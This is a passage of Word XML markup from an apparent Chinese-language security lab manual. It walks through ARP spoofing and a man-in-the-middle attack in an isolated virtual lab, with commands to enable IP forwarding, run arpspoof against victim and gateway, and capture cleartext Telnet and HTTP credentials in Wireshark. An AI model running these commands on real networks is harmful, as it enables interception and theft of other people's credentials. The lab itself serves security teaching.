          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者主动诱使流量经过自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，从而在交换式网络中也能够捕捉单播流量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:hyperlink w:anchor="靶机实操单元">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t xml:space="preserve">靶机实操单元</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实验目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在隔离实验网络中完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MITM，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察改道后的明文凭据，并验证防御措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机：Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux（或任何安装了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arpspoof</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bettercap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发行版）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A：Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 / Metasploitable 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或任何运行明文服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机（本实验以其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务为嗅探目标）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B（可选，用于验证双向欺骗）：另一台同网段虚拟机。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：三台虚拟机连接至同一虚拟网络（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部网络</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">intnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VMware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅主机模式），确保彼此二层可达，且与宿主机/互联网隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【步骤一：确认二层连通性】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻击机上确认目标可达，并记录当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">arp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录网关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;GATEWAY_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（通常是虚拟网络的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，需根据实际环境确认）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【步骤二：开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tee /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 或</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sysctl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【步骤三：启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arpspoof</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例（开两个终端分别执行）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 终端 1：毒化受害者 ARP 缓存</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arpspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ETH_INTERFACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 终端 2：毒化网关 ARP 缓存（如网关不可控，可仅做半双工）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arpspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ETH_INTERFACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保持两个终端运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【步骤四：攻击机抓包】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻击机上启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark，选择攻击接口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ETH_INTERFACE&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，设置显示过滤器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.addr == &lt;VICTIM_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【步骤五：受害者产生明文流量】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在受害者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A（Metasploitable）上执行一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录（或从另一虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到受害者）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入用户名与密码（如实验环境中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的测试账户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，实际凭据因靶机而异）。还可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问受害者上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录页面）以产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文流量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（实际输出因网络条件和工具版本而异）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻击机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，应看到原本不经过攻击机的受害者-网关间报文如今出现在捕获列表中。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
